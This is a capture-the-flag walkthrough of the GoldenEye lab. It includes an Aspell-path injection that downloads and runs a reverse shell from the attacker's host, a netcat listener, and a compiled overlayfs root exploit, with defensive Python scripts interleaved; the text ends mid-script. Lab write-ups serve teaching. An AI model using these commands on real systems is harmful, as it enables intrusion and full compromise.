MIME Type                       : image/jpeg
JFIF Version                    : 1.01
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : eFdpbnRlcjE5OTV4IQ==
Make                            : GoldenEye
Resolution Unit                 : inches
Software                        : linux
Artist                          : For James
Y Cb Cr Positioning             : Centered
Exif Version                    : 0231
Components Configuration        : Y, Cb, Cr, -
User Comment                    : For 007
Flashpix Version                : 0100
Image Width                     : 313
Image Height                    : 212
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 313x212
Megapixels                      : 0.066
                                                                                                                       
┌──(kali㉿kali)-[~]
└─$

Analyzing the file for-007.jpg with exiftool reveals several key pieces of metadata. One specific piece of data stands out: the encoded text in the " Image Description " field, which appears to be base64.

Let's decode it. Running the value through base64 -d produces the following string.

┌──(kali㉿kali)-[~]
└─$ echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d
xWinter1995x!                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

This decoded string is likely a password or a key phrase. 

  • Username: Admin
  • Password: xWinter1995x!
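The base64 hunt above was done by eye; when triaging many images it helps to pull the Exif tags directly and flag any value that decodes cleanly. The following Python script is an added example, not part of the original walkthrough and not exiftool's code: it builds a small constructed JPEG carrying the same Image Description, Make and Artist values shown above, parses the APP1/TIFF structure itself, and reports which ASCII tags are base64. The fixture builder, the tag constants and the base64 heuristic are my own assumptions.

```python
import base64
import binascii
import re
import struct

# Exif/TIFF tag ids of interest (type 2 = ASCII), from the TIFF 6.0 tag list.
TAG_IMAGE_DESCRIPTION = 0x010E
TAG_MAKE = 0x010F
TAG_ARTIST = 0x013B


def build_exif_jpeg(tags):
    """Constructed fixture: a minimal JPEG (SOI, one big-endian Exif APP1
    segment, EOI) whose IFD0 holds the given {tag_id: ascii_string} entries.
    Strings are assumed longer than 3 bytes so they are always stored
    out-of-line; there is no image data, which the parser never needs."""
    n = len(tags)
    entries, data = b"", b""
    data_offset = 8 + 2 + 12 * n + 4          # TIFF header + count + entries + next-IFD
    for tag_id, text in sorted(tags.items()):
        value = text.encode("ascii") + b"\x00"  # ASCII values are NUL-terminated
        entries += struct.pack(">HHII", tag_id, 2, len(value), data_offset + len(data))
        data += value
    tiff = (b"MM\x00\x2a" + struct.pack(">I", 8) + struct.pack(">H", n)
            + entries + b"\x00\x00\x00\x00" + data)
    payload = b"Exif\x00\x00" + tiff
    app1 = b"\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload
    return b"\xff\xd8" + app1 + b"\xff\xd9"


def _parse_ifd0(tiff):
    """Return {tag_id: string} for every ASCII tag in the first IFD."""
    order = {b"MM": ">", b"II": "<"}.get(tiff[:2])
    if order is None:
        raise ValueError("bad TIFF byte-order mark")
    ifd = struct.unpack(order + "I", tiff[4:8])[0]
    count = struct.unpack(order + "H", tiff[ifd:ifd + 2])[0]
    tags = {}
    for i in range(count):
        entry = tiff[ifd + 2 + 12 * i: ifd + 14 + 12 * i]
        tag_id, typ, num, raw = struct.unpack(order + "HHI4s", entry)
        if typ != 2:
            continue
        if num <= 4:
            value = raw[:num]                     # short values live inline
        else:
            off = struct.unpack(order + "I", raw)[0]
            value = tiff[off:off + num]
        tags[tag_id] = value.rstrip(b"\x00").decode("ascii", "replace")
    return tags


def read_exif_ascii_tags(jpeg):
    """Walk the JPEG segment chain up to the scan data and parse the Exif APP1
    segment if present. Returns {} for a JPEG without Exif."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(jpeg):
        marker, length = struct.unpack(">HH", jpeg[pos:pos + 4])
        if marker in (0xFFD9, 0xFFDA):           # EOI or SOS: no more metadata segments
            break
        segment = jpeg[pos + 4:pos + 2 + length]
        pos += 2 + length
        if marker == 0xFFE1 and segment.startswith(b"Exif\x00\x00"):
            return _parse_ifd0(segment[6:])
    return {}


BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


def decode_if_base64(text):
    """Return the decoded text if `text` is well-formed base64 of printable ASCII,
    otherwise None. Ordinary words such as 'GoldenEye' use the same alphabet, so
    the length rule and the decoded bytes are checked as well."""
    if len(text) % 4 or not BASE64_RE.match(text):
        return None
    try:
        decoded = base64.b64decode(text, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None


def find_encoded_metadata(jpeg):
    """Triage helper: list (tag_id, raw_value, decoded_value) for every ASCII
    Exif tag whose value decodes as base64."""
    hits = []
    for tag_id, value in sorted(read_exif_ascii_tags(jpeg).items()):
        decoded = decode_if_base64(value)
        if decoded is not None:
            hits.append((tag_id, value, decoded))
    return hits


# Constructed sample mirroring the exiftool output above.
SAMPLE_JPEG = build_exif_jpeg({
    TAG_IMAGE_DESCRIPTION: "eFdpbnRlcjE5OTV4IQ==",
    TAG_MAKE: "GoldenEye",
    TAG_ARTIST: "For James",
})

if __name__ == "__main__":
    for tag_id, raw, decoded in find_encoded_metadata(SAMPLE_JPEG):
        print("tag 0x%04X: %s -> %s" % (tag_id, raw, decoded))
```

Only the Image Description is reported: "GoldenEye" is nine characters, which no valid base64 string can be, and "For James" contains a space. Run on a real file, the same function can be fed the bytes of for-007.jpg, since the parser only needs the APP1 segment that exiftool also reads.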

Finally, let's use these credentials to log in as admin. With the decoded string as the password, the login succeeds.

Since we now have access to the admin dashboard, let's look for an area where we can upload or inject a reverse shell script to gain a foothold on the server.


Foothold

While navigating through various sections, I came across a critical area labeled " System path " under Site Administration on the server.

This is the configuration page within Moodle that holds the settings related to system paths.

Let's examine each setting to understand how it could be used to gain a reverse shell. While exploring this page, I found a particularly interesting field: the one meant for specifying the path to the Aspell utility accepts shell commands as input.

Aspell is commonly used for spell-checking within the text editor.


Gain a Reverse shell using the Aspell Spell-checking tool

According to the tooltip, the default path for Aspell is typically /usr/bin/aspell , but this can vary depending on the server's configuration. It's crucial to specify the correct path for the spell-checking functionality to operate effectively.

After reviewing the details, I devised a method to initiate a reverse shell. 

This involves creating a reverse shell file and crafting a command that will download and execute it on the server. By clicking on the Spell check function within the Moodle interface, the crafted command aims to trigger a reverse shell, establishing a connection back to a listener set up for this purpose.
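From the defender's side, the weakness here is a configuration field whose value ends up on a shell command line. The block below is an added example, not Moodle's code: it models a generic "path to the spell-check binary" setting, shows the unsafe string-splicing pattern next to a validator that only accepts a clean absolute path to an allow-listed executable, and returns an argv list meant for a shell-free subprocess call. The fake aspell created in a temporary directory by demo(), the allow list and the function names are assumptions of the example.

```python
import os
import re
import stat
import tempfile

# Directories an administrator may legitimately point the spell checker at.
ALLOWED_DIRS = ("/usr/bin", "/usr/local/bin", "/bin")

# Whitespace, quotes and every character a POSIX shell treats specially.
SHELL_META = re.compile(r"""[\s;&|`$<>(){}\[\]*?!~'"\\]""")


def build_command_unsafe(configured_path, words_file):
    """Vulnerable pattern: the stored setting is spliced into a shell command
    line, so any shell syntax saved in the setting runs as part of the command."""
    return "%s -a < %s" % (configured_path, words_file)


def validate_tool_path(value, allowed_dirs=ALLOWED_DIRS):
    """Return (ok, reason). Accept only an absolute, canonical path to an existing
    regular, non-world-writable executable inside an allow-listed directory,
    with no whitespace or shell metacharacters."""
    if not value or not value.startswith("/"):
        return False, "path must be absolute"
    if SHELL_META.search(value):
        return False, "path contains whitespace or shell metacharacters"
    real = os.path.realpath(value)
    if real != os.path.normpath(value):
        return False, "path is not canonical (symlink or '..' component)"
    if os.path.dirname(real) not in allowed_dirs:
        return False, "directory is not in the allow list"
    try:
        st = os.stat(real)
    except OSError:
        return False, "file does not exist"
    if not stat.S_ISREG(st.st_mode):
        return False, "not a regular file"
    if not st.st_mode & stat.S_IXUSR:
        return False, "file is not executable"
    if st.st_mode & stat.S_IWOTH:
        return False, "binary is world-writable"
    return True, "ok"


def build_command_safe(configured_path, allowed_dirs=ALLOWED_DIRS):
    """Hardened pattern: validate, then return an argv list to hand to
    subprocess.run(argv, stdin=words_fh) with no shell in between, so the
    setting can only ever name a program, never append commands."""
    ok, reason = validate_tool_path(configured_path, allowed_dirs)
    if not ok:
        raise ValueError("rejected spell checker path %r: %s" % (configured_path, reason))
    return [configured_path, "-a"]


def demo():
    """Exercise both builders against a fake 'aspell' in a temporary allow-listed
    directory (constructed; no real spell checker is needed)."""
    tmp = os.path.realpath(tempfile.mkdtemp())
    tool = os.path.join(tmp, "aspell")
    with open(tool, "w") as fh:
        fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(tool, 0o755)
    injected = tool + "; id"                      # setting value with an appended command
    results = {
        "unsafe_cmd": build_command_unsafe(injected, "/tmp/words.txt"),
        "safe_argv": build_command_safe(tool, (tmp,)),
        "valid": validate_tool_path(tool, (tmp,)),
        "injected": validate_tool_path(injected, (tmp,)),
        "relative": validate_tool_path("aspell", (tmp,)),
        "missing": validate_tool_path(os.path.join(tmp, "nope"), (tmp,)),
    }
    os.chmod(tool, 0o777)
    results["world_writable"] = validate_tool_path(tool, (tmp,))
    try:
        build_command_safe(injected, (tmp,))
        results["safe_rejects_injection"] = False
    except ValueError:
        results["safe_rejects_injection"] = True
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-22s %s" % (name, value))
```

The unsafe builder happily produces a command line with "; id" embedded in it; the validator rejects the same value on the first metacharacter, and even a clean path is refused when the binary is world-writable, because a writable binary lets anyone who can write to it run code as the web server whenever spell-check is triggered.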

So, we need to craft a PHP reverse Perl shell payload. To create it, we will use msfvenom . On the terminal, run the following command:

msfvenom -p <Path of the payload> lhost= <Local Host IP> lport= <Port> -f raw -o <Path-to-save>

Where, 

  • -p specifies the payload type, here PHP reverse Perl , which creates a PHP script that establishes a reverse Perl shell.
  • lhost sets the local host IP address (your Kali Linux machine's IP) that the reverse shell will connect back to.
  • lport sets the local port on which the reverse shell will communicate.
  • -f raw specifies the output format as raw, so the payload is written out in its raw form.
  • -o specifies the output file location and name where the generated PHP script will be saved.

┌──(kali㉿kali)-[~]
└─$ msfvenom -p php/reverse_perl lhost=192.168.95.3 lport=4444 -f raw -o /home/kali/reverse.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1880 bytes
Saved as: /home/kali/reverse.php
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

Upon execution, the payload was successfully generated and saved as reverse.php in the /home/kali directory, which can be confirmed using the ls command.

┌──(kali㉿kali)-[~]
└─$ ls   
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  for-007.jpg  reverse.php
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$

Next, we start a Python HTTP server. This command serves the current directory on port 8000 of our Kali Linux machine.

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

This server lets us host files locally and serve them over HTTP. Now, let's craft the shell command. It downloads reverse.php from our server, saves it to the /tmp directory, and then executes it with the php command.

sh -c '(wget http://192.168.95.3:8000/reverse.php -O /tmp/reverse.php && php /tmp/reverse.php)'

Before we proceed further, let me start a listener using Netcat. 

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...

Paste the crafted command in the aspell path and click on “ Save changes ”. 

To execute the command, we need to reach the spell checker, which is available from " Edit course " or " Create a New course ". Navigate to courses, then GNO, then Intro.

Because editing is off, we cannot edit anything yet, so switch editing from off to on.

Now that editing is possible, click on any of these items.

It opens an area where we can modify the content and, most importantly, a " Toggle Spell Checker " button.

Alternatively, we can “ Add a new entry ” by navigating to “ Site blog ” found in “ Site pages ”. Click on “ Add a new entry ”, which will provide an area where you can write your blog.

Add some input for general purposes, and Click on " Toggle spell checker " to check if the spell checker is functioning correctly.

However, after clicking " Toggle spell checker," we noticed that a reverse shell connection to our listener was not established. 

To resolve this issue, we need to identify the problem. Navigate to " Site administration " and then to " Plugins ." Under " Text-editor plugins," locate the " TinyMCE HTML editor ."

Upon inspecting the settings, we discovered that the spell checker engine was set to Google Spell. This means that when the " Toggle spell checker " is clicked, it uses the Google Spell Check engine instead of Aspell, which is required for our reverse shell to work.


To fix this, change the spell checker engine from the dropdown menu to " PSpell Shell ." Return to the " Site blog " where you add a new entry. Click on " Toggle spell checker " again.

Now, we should successfully establish a foothold on the server.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.95.3] from (UNKNOWN) [192.168.95.19] 57359

The shell is not fully interactive, so let's upgrade it to a proper TTY using Python.

which python
/usr/bin/python
python -c "import pty;pty.spawn('/bin/bash')"
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$

Now that we have obtained a shell, it’s time to check for the user flag. Start by changing the directory to /home .

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /home
cd /home
www-data@ubuntu:/home$ ls -al
ls -al
total 20
drwxr-xr-x  5 root    root    4096 Apr 29  2018 .
drwxr-xr-x 22 root    root    4096 Apr 24  2018 ..
drwxr-xr-x  4 boris   boris   4096 May 24 15:51 boris
drwxr-xr-x  4 doak    doak    4096 Apr 28  2018 doak
drwxr-xr-x  4 natalya natalya 4096 Apr 28  2018 natalya
www-data@ubuntu:/home$ 

Upon listing all files and directories, I discovered three directories: boris , doak , and natalya . These seem to be the user directories on our target machine. Let’s check each one for flags.

www-data@ubuntu:/home$ cd boris
cd boris
www-data@ubuntu:/home/boris$ ls -al
ls -al
total 36
drwxr-xr-x 4 boris boris 4096 May 24 15:51 .
drwxr-xr-x 5 root  root  4096 Apr 29  2018 ..
-rw-rw-r-- 1 boris boris   63 Apr 28  2018 .bash_history
-rw-r--r-- 1 boris boris  220 Apr 23  2018 .bash_logout
-rw-r--r-- 1 boris boris 3637 Apr 23  2018 .bashrc
drwx------ 2 boris boris 4096 Apr 23  2018 .cache
-rw-r--r-- 1 boris boris  675 Apr 23  2018 .profile
-rw------- 1 boris boris  795 Apr 27  2018 .viminfo
drwx------ 3 boris boris 4096 May 24 15:51 mail
www-data@ubuntu:/home/boris$ cd /home/doak
cd /home/doak
www-data@ubuntu:/home/doak$ ls -al
ls -al
total 28
drwxr-xr-x 4 doak doak 4096 Apr 28  2018 .
drwxr-xr-x 5 root root 4096 Apr 29  2018 ..
-rw-r--r-- 1 doak doak  220 Apr 24  2018 .bash_logout
-rw-r--r-- 1 doak doak 3637 Apr 24  2018 .bashrc
drwx------ 2 doak doak 4096 Apr 28  2018 .cache
-rw-r--r-- 1 doak doak  675 Apr 24  2018 .profile
drwx------ 3 doak doak 4096 Apr 24  2018 mail
www-data@ubuntu:/home/doak$ cd /home/natalya
cd /home/natalya                                                                                                                               
www-data@ubuntu:/home/natalya$ ls -al                                                                                                          
ls -al                                                                                                                                         
total 28                                                                                                                                       
drwxr-xr-x 4 natalya natalya 4096 Apr 28  2018 .                                                                                               
drwxr-xr-x 5 root    root    4096 Apr 29  2018 ..                                                                                              
-rw-r--r-- 1 natalya natalya  220 Apr 24  2018 .bash_logout                                                                                    
-rw-r--r-- 1 natalya natalya 3637 Apr 24  2018 .bashrc                                                                                         
drwx------ 2 natalya natalya 4096 Apr 28  2018 .cache                                                                                          
-rw-r--r-- 1 natalya natalya  675 Apr 24  2018 .profile                                                                                        
drwx------ 3 natalya natalya 4096 Apr 24  2018 mail                                                                                            
www-data@ubuntu:/home/natalya$ 

Unfortunately, none of these directories contain a flag. It appears there might only be one flag on this vulnerable machine, possibly located in the root directory. 

Since we do not have user privileges to access the root directory, further escalation will be necessary to retrieve it.


Privilege Escalation

During the privilege escalation process, our main objective is to gather system information and identify any potential vulnerabilities or misconfigurations that could grant us higher privileges, ultimately allowing access to the root level.

Previously, we could not enumerate user rights and privileges on the system because we had no user-level access. However, we did find the passwords associated with the users, which we used to access the POP3 service. Let's use those passwords to check if we can switch to any of these three users.

www-data@ubuntu:/home/natalya$ su natalya                                                                                                      
su natalya                                                                                                                                     
Password: bird                                                                                                                                 
                                                                                                                                               
This account is currently not available.                                                                                                       
www-data@ubuntu:/home/natalya$ su doak                                                                                                          
su doak                                                                                                                                        
Password: goat                                                                                                                                  
                                                                                                                                               
This account is currently not available.                                                                                                       
www-data@ubuntu:/home/natalya$ su boris
su boris                                                                                                                                       
Password: secret1!                                                                                                                             
                                                                                                                                               
This account is currently not available.                                                                                                       
www-data@ubuntu:/home/natalya$

Upon trying, I found out that these three accounts are currently inactive. So, let’s check if we can still perform privilege escalation directly from here. First, let's gather system information by executing the uname -a command.

www-data@ubuntu:/home/natalya$ uname -a                                                                                                         
uname -a                                                                                                                                       
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux                                      
www-data@ubuntu:/home/natalya$

Upon execution, it prints out that the kernel version is Linux ubuntu 3.13.0-32-generic . Let's search for an exploit using searchsploit .

┌──(kali㉿kali)-[~]
└─$ searchsploit Linux ubuntu 3.13.0           
----------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                           |  Path
----------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privileg | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privileg | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege  | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)          | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                     | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation            | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                   | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege E | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation ( | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Pr | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation   | linux/local/41760.txt
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

Upon execution, it provides various suitable exploits. 
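What searchsploit does here is a version-range comparison, and the same comparison is what a defender runs across a fleet to find kernels that need patching. The script below is an added example (not the page's code and not Exploit-DB's): it parses the "X < Y" ranges out of a subset of the searchsploit titles shown above, reads the kernel release from the uname -a line, and lists the entries whose range contains it. The constructed sample rows are copied from the output above; the parsing rules for the title format are my assumption, and the row for "Ubuntu < 15.10" is included to show why non-kernel titles must be skipped.

```python
import re

# Constructed sample: a subset of the searchsploit rows shown above, in the
# "title | path" form searchsploit prints (titles truncated exactly as printed).
SEARCHSPLOIT_ROWS = """\
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privileg | linux/local/37292.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege  | linux_x86-64/local/31347.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                     | linux/dos/43234.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                   | linux/local/44298.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation ( | linux/local/43418.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation   | linux/local/41760.txt
"""

# The uname -a line from the target, copied from the session above.
UNAME_A = ("Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 "
           "x86_64 x86_64 x86_64 GNU/Linux")

VERSION = r"\d+(?:\.\d+)*(?:-\d+)?"
# Optional inclusive lower bound, then "<", then the exclusive upper bound.
RANGE_RE = re.compile(r"(?:(%s)\s+)?<\s*(%s)" % (VERSION, VERSION))


def parse_version(text):
    """'3.13.0-32-generic' -> (3, 13, 0, 32); '3.19' -> (3, 19).
    The Ubuntu ABI number after '-' is kept as a fourth component so that
    ranges such as '< 4.4.0-116' compare correctly."""
    m = re.match(r"(\d+(?:\.\d+)*)(?:-(\d+))?", text)
    if not m:
        raise ValueError("not a kernel version: %r" % text)
    parts = [int(p) for p in m.group(1).split(".")]
    if m.group(2) is not None:
        parts.append(int(m.group(2)))
    return tuple(parts)


def kernel_release(uname_a_line):
    """The third field of `uname -a` is the kernel release string."""
    return uname_a_line.split()[2]


def parse_ranges(title):
    """Extract (low_inclusive, high_exclusive) pairs from an Exploit-DB title.
    'Linux Kernel 3.13.0 < 3.19 ...' -> [((3, 13, 0), (3, 19))]
    'Linux Kernel < 4.4.0-116 ...'   -> [((), (4, 4, 0, 116))]   (no lower bound)"""
    return [(parse_version(low) if low else (), parse_version(high))
            for low, high in RANGE_RE.findall(title)]


def affected_entries(uname_a_line, rows):
    """Return (path, low, high) for every 'Linux Kernel' row whose version range
    contains the running kernel. Version-only matching is a triage signal:
    distribution backports can patch a kernel without a version bump, so each
    hit still needs confirmation against the vendor advisory."""
    kernel = parse_version(kernel_release(uname_a_line))
    hits = []
    for line in rows.splitlines():
        if "|" not in line:
            continue
        title, path = (s.strip() for s in line.split("|", 1))
        if not title.startswith("Linux Kernel"):
            continue   # e.g. 'Ubuntu < 15.10' is a distro release, not a kernel version
        for low, high in parse_ranges(title):
            if low <= kernel < high:
                hits.append((path, low, high))
                break
    return hits


if __name__ == "__main__":
    for path, low, high in affected_entries(UNAME_A, SEARCHSPLOIT_ROWS):
        print("%-28s %s <= kernel < %s" % (path, low or "(any)", high))
```

For the 3.13.0-32 kernel every "Linux Kernel" row matches, which is the real finding: a 2014 kernel is inside the affected range of years of published issues, and the fix is the distribution's kernel update rather than any single entry. Feeding a 3.19 release to the same function drops the overlayfs rows, as the test shows.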


Overlayfs Local Privilege Escalation

Let's use one of these. I think the 'overlayfs' Local Privilege exploit is suitable for our target. Before using this exploit, let’s check if there is a GCC compiler available. 

www-data@ubuntu:/home/natalya$ gcc --version                                                                                                   
gcc --version                                                                                                                                  
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'                          
www-data@ubuntu:/home/natalya$

Unfortunately, the GCC compiler is not available on the target machine. However, other compilers such as cc and clang may be present. Let's check if cc is available.

www-data@ubuntu:/home/natalya$ cc --version                                                                                                    
cc --version                                                                                                                                   
Ubuntu clang version 3.4-1ubuntu3 (tags/RELEASE_34/final) (based on LLVM 3.4)                                                                  
Target: x86_64-pc-linux-gnu                                                                                                                    
Thread model: posix                                                                                                                            
www-data@ubuntu:/home/natalya$

The cc compiler is available, but the exploit invokes gcc, so we need to modify the C program to use cc instead. First, save the 'overlayfs' Local Privilege exploit locally.

┌──(kali㉿kali)-[~]
└─$ searchsploit -m linux/local/37292.c
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292
     Path: /usr/share/exploitdb/exploits/linux/local/37292.c
    Codes: CVE-2015-1328
 Verified: True
File Type: C source, ASCII text, with very long lines (466)
Copied to: /home/kali/37292.c


                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

Then, open it in a text editor and change the compiler it calls from gcc to cc so that it works on the target.

┌──(kali㉿kali)-[~]
└─$  nano 37292.c

Next, let's send this modified exploit to the target. The HTTP server we started earlier is still running on the default port 8000, so we need to start a second one on a different port.

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

Change the directory to /tmp . To download the exploit file, we will use the wget command.  

www-data@ubuntu:/home/natalya$ cd /tmp                                                                                                         
cd /tmp                                                                                                                                        
www-data@ubuntu:/tmp$ wget http://192.168.95.3:8888/37292.c                                                                                    
wget http://192.168.95.3:8888/37292.c                                                                                                          
--2024-06-27 05:37:54--  http://192.168.95.3:8888/37292.c                                                                                      
Connecting to 192.168.95.3:8888... connected.                                                                                                  
HTTP request sent, awaiting response... 200 OK                                                                                                 
Length: 4968 (4.9K) [text/x-csrc]                                                                                                              
Saving to: '37292.c'                                                                                                                           
                                                                                                                                               
100%[======================================>] 4,968       --.-K/s   in 0s                                                                      
                                                                                                                                               
2024-06-27 05:37:54 (309 MB/s) - '37292.c' saved [4968/4968]                                                                                   
                                                                                                                                               
www-data@ubuntu:/tmp$

Now, compile the program using the cc compiler.

www-data@ubuntu:/tmp$ ls -al                                                                                                                   
ls -al                                                                                                                                         
total 28                                                                                                                                       
drwxrwxrwt  4 root     root     4096 Jun 27 05:37 .                                                                                            
drwxr-xr-x 22 root     root     4096 Apr 24  2018 ..
drwxrwxrwt  2 root     root     4096 Jun 27 04:40 .ICE-unix
drwxrwxrwt  2 root     root     4096 Jun 27 04:40 .X11-unix
-rw-rw-rw-  1 www-data www-data 4968 Jun 27 00:06 37292.c
-rw-rw-rw-  1 www-data www-data 1913 Jun 26 23:47 reverse.php
www-data@ubuntu:/tmp$ cc 37292.c -o ofs
cc 37292.c -o ofs                                                                                                                              
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]                                                              
}                                                                                                                                              
^                                                                                                                                              
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]                        
        if(unshare(CLONE_NEWUSER) != 0)                                                                                                        
           ^                                                                                                                                   
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]                          
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);                                                               
                ^                                                                                                                              
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]                        
            waitpid(pid, &status, 0);                                                                                                          
            ^                                                                                                                                  
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]                            
    wait(NULL);                                                                                                                                
    ^                                                                                                                                          
5 warnings generated.                                                                                                                           
www-data@ubuntu:/tmp$ 

Upon execution, five warnings were generated, but the exploit was successfully compiled. Now, execute it and check if we have a root shell.

www-data@ubuntu:/tmp$ ls -al                                                                                                                   
ls -al                                                                                                                                         
total 44                                                                                                                                       
drwxrwxrwt  4 root     root      4096 Jun 27 05:39 .
drwxr-xr-x 22 root     root      4096 Apr 24  2018 ..
drwxrwxrwt  2 root     root      4096 Jun 27 04:40 .ICE-unix
drwxrwxrwt  2 root     root      4096 Jun 27 04:40 .X11-unix
-rw-rw-rw-  1 www-data www-data  4968 Jun 27 00:06 37292.c
-rwxrwxrwx  1 www-data www-data 13773 Jun 27 05:39 ofs
-rw-rw-rw-  1 www-data www-data  1913 Jun 26 23:47 reverse.php
www-data@ubuntu:/tmp$ ./ofs
./ofs                                                                                                                                          
spawning threads                                                                                                                               
mount #1                                                                                                                                       
mount #2                                                                                                                                       
child threads done                                                                                                                             
/etc/ld.so.preload created                                                                                                                     
creating shared library                                                                                                                        
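The line "/etc/ld.so.preload created" is the most useful artefact in that output for an incident responder: on most hosts the file should not exist at all, and any library it names is loaded into every dynamically linked process that starts afterwards. The audit below is an added example, not the exploit's code and not a tool from the page: it reports whether the file exists and flags entries that are missing, live outside the standard library directories, are not owned by root, or are writable by others. The trusted directory list and the constructed sample written by demo() are assumptions.

```python
import os
import stat
import tempfile

# Where shared objects normally live; a preload entry elsewhere deserves a look.
TRUSTED_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64",
                    "/lib/x86_64-linux-gnu", "/usr/lib/x86_64-linux-gnu")


def audit_ld_so_preload(path="/etc/ld.so.preload", trusted_dirs=TRUSTED_LIB_DIRS):
    """Return a list of finding strings. An empty list means the file is absent,
    which is the expected state on most hosts. Every whitespace-separated entry
    is a shared object the dynamic linker injects into each dynamically linked
    program, so the file's presence alone is worth an alert and every entry is
    checked for location, existence, ownership and permissions."""
    findings = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return findings
    findings.append("%s exists (mtime %d)" % (path, int(st.st_mtime)))
    if stat.S_ISLNK(st.st_mode):
        findings.append("%s is a symlink" % path)
        st = os.stat(path)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("%s is writable by group or others" % path)
    with open(path) as fh:
        entries = fh.read().split()
    if not entries:
        findings.append("%s is empty" % path)
    for entry in entries:
        if not entry.startswith("/"):
            findings.append("entry %r is not an absolute path" % entry)
            continue
        if os.path.dirname(entry) not in trusted_dirs:
            findings.append("entry %s is outside the standard library directories" % entry)
        try:
            est = os.stat(entry)
        except OSError:
            findings.append("entry %s does not exist (stale or already removed)" % entry)
            continue
        if est.st_uid != 0:
            findings.append("entry %s is not owned by root (uid %d)" % (entry, est.st_uid))
        if est.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append("entry %s is writable by group or others" % entry)
    return findings


def demo():
    """Constructed sample: a temporary 'ld.so.preload' naming one world-writable
    library in a scratch directory and one library path that does not exist."""
    tmp = tempfile.mkdtemp()
    lib = os.path.join(tmp, "libfake.so")
    with open(lib, "w") as fh:
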